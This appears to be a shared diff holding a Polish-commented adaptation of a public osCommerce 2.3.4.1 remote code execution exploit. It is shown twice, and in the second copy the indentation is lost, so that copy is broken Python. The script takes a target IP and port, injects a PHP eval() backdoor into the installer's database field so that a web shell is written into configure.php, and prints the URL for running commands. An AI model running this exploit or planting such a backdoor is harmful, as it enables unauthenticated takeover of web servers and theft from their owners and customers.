Sarverott · October 28, 2024 01:44
diff --git a/explevaler-php.py b/explevaler-php.py
 #przerobka exploita 44374.py z exploit-db.com

 # Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
 # Date: 29.0.3.2018
 # Exploit Author: Simon Scannell - https://scannell-infosec.net <[email protected]>
 # Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
 # Tested on: Linux, Windows

 # If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
 # for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
 # is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
 # execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
 # PHP code into the config file and then simply executing the code by opening it.


 import requests

 iptarget=input("IP: ")
 porttarget=input("PORT: ")
 getvallabel=input("label (default: cmd) :") or "cmd"

 # enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
 base_url = "http://"+iptarget+":"+porttarget+"/oscommerce-2.3.4/catalog/"
 target_url = "http://"+iptarget+":"+porttarget+"/oscommerce-2.3.4/catalog/install/install.php?step=4"

 data = {
    'DIR_FS_DOCUMENT_ROOT': './'
 }

 # the payload will be injected into the configuration file via this code
 # '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
 # so the format for the exploit will be: '); PAYLOAD; /*

 payload = '\');'
 payload += 'if(isset($_GET["'+getvallabel+'"])){eval($_GET["'+getvallabel+'"]);}'    # this is where you enter you PHP payload #########tu byl system()
 payload += '//' ######ten komentarz byl inny (/*)

 data['DB_DATABASE'] = payload

 # exploit it
 r = requests.post(url=target_url, data=data)

 if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php?"+getvallabel+"=echo%201;")
    ###### do orginalnych sciezek dodajesz ?cmd=die(); #to zabije wykonywanie na przyklad
 else:
    print("[-] Exploit did not execute as planned")
	#przerobka exploita 44374.py z exploit-db.com

	# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
	# Date: 29.0.3.2018
	# Exploit Author: Simon Scannell - https://scannell-infosec.net <[email protected]>
	# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
	# Tested on: Linux, Windows

	# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
	# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
	# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
	# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
	# PHP code into the config file and then simply executing the code by opening it.


	import requests

	iptarget=input("IP: ")
	porttarget=input("PORT: ")
	getvallabel=input("label (default: cmd) :") or "cmd"

	# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
	base_url = "http://"+iptarget+":"+porttarget+"/oscommerce-2.3.4/catalog/"
	target_url = "http://"+iptarget+":"+porttarget+"/oscommerce-2.3.4/catalog/install/install.php?step=4"

	data = {
	'DIR_FS_DOCUMENT_ROOT': './'
	}

	# the payload will be injected into the configuration file via this code
	# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
	# so the format for the exploit will be: '); PAYLOAD; /*

	payload = '\');'
	payload += 'if(isset($_GET["'+getvallabel+'"])){eval($_GET["'+getvallabel+'"]);}' # this is where you enter you PHP payload #########tu byl system()
	payload += '//' ######ten komentarz byl inny (/*)

	data['DB_DATABASE'] = payload

	# exploit it
	r = requests.post(url=target_url, data=data)

	if r.status_code == 200:
	print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php?"+getvallabel+"=echo%201;")
	###### do orginalnych sciezek dodajesz ?cmd=die(); #to zabije wykonywanie na przyklad
	else:
	print("[-] Exploit did not execute as planned")